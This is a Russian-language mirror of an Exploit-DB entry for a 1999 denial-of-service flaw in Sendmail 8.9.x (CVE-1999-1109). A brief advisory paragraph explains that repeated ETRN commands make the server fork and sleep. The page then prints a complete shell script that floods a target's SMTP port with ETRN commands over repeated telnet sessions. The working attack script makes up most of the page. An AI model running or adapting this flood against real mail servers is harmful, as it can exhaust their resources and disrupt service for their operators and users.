- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19701
- Проверка EDB
-
- Пройдено
- Автор
- MICHAL ZALEWSKI
- Тип уязвимости
- DOS
- Платформа
- LINUX
- CVE
- cve-1999-1109
- Дата публикации
- 1999-12-22
Eric Allman Sendmail 8.9.1/8.9.3 - ETRN Denial of Service
Код:
source: https://www.securityfocus.com/bid/904/info
There is a low-bandwidth dos vulnerability in Sendmail. When a client connects to the sendmail smtpd and sends an ETRN command to the server, the server fork()s and sleeps for 5 seconds. If many ETRN commands are sent to a server, it is possible to exhaust system resources and cause a denial of service or even a reboot of the server.
#!/bin/sh
TARGET=localhost
COUNT=150
SLEEP=1
echo "gurghfrbl.sh - (c) lcamtuf '99"
echo -n "Tickle"
while :; do
echo -n "."
(
NIC=0
while [ "$NIC" -lt "$COUNT" ]; do
echo "ETRN x"
done
) | telnet $TARGET 25 &>/dev/null &
sleep $SLEEP
killall -9 telnet &>/dev/null
done- Источник
- www.exploit-db.com
